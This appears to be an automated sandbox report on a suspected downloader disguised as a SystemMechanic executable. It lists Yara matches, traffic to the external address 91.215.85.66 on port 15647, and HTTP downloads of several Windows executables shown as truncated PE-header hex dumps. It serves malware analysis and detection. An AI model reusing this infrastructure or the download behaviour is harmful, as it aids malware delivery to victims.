Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49805

Yara detected Generic Downloader

Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217294b49f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2172952eb15.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49750 -> 91.215.85.66:15647

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:26:55 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 28 Apr 2024 23:15:02 GMTETag: "4ba00-617304e711e86"Accept-Ranges: bytesContent-Length: 309760Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5a cd db 04 1e ac b5 57 1e ac b5 57 1e ac b5 57 13 fe 6a 57 3e ac b5 57 13 fe 55 57 99 ac b5 57 13 fe 54 57 30 ac b5 57 17 d4 26 57 1d ac b5 57 1e ac b4 57 6f ac b5 57 ab 32 50 57 1f ac b5 57 13 fe 6e 57 1f ac b5 57 ab 32 6b 57 1f ac b5 57 52 69 63 68 1e ac b5 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 16 7b b5 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 08 01 00 00 30 60 01 00 00 00 00 4f 3e 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 61 01 00 04 00 00 9b 51 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 84 01 00 28 00 00 00 00 90 5f 01 a8 b9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 61 01 d8 13 00 00 f0 21 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 79 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f3 07 01 00 00 10 00 00 00 08 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 6d 00 00 00 20 01 00 00 6e 00 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 f3 5d 01 00 90 01 00 00 72 01 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 b9 01 00 00 90 5f 01 00 ba 01 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 13 00 00 00 50 61 01 00 14 00 00 00 a6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:26:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:05 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:06 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 28 Apr 2024 23:27:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 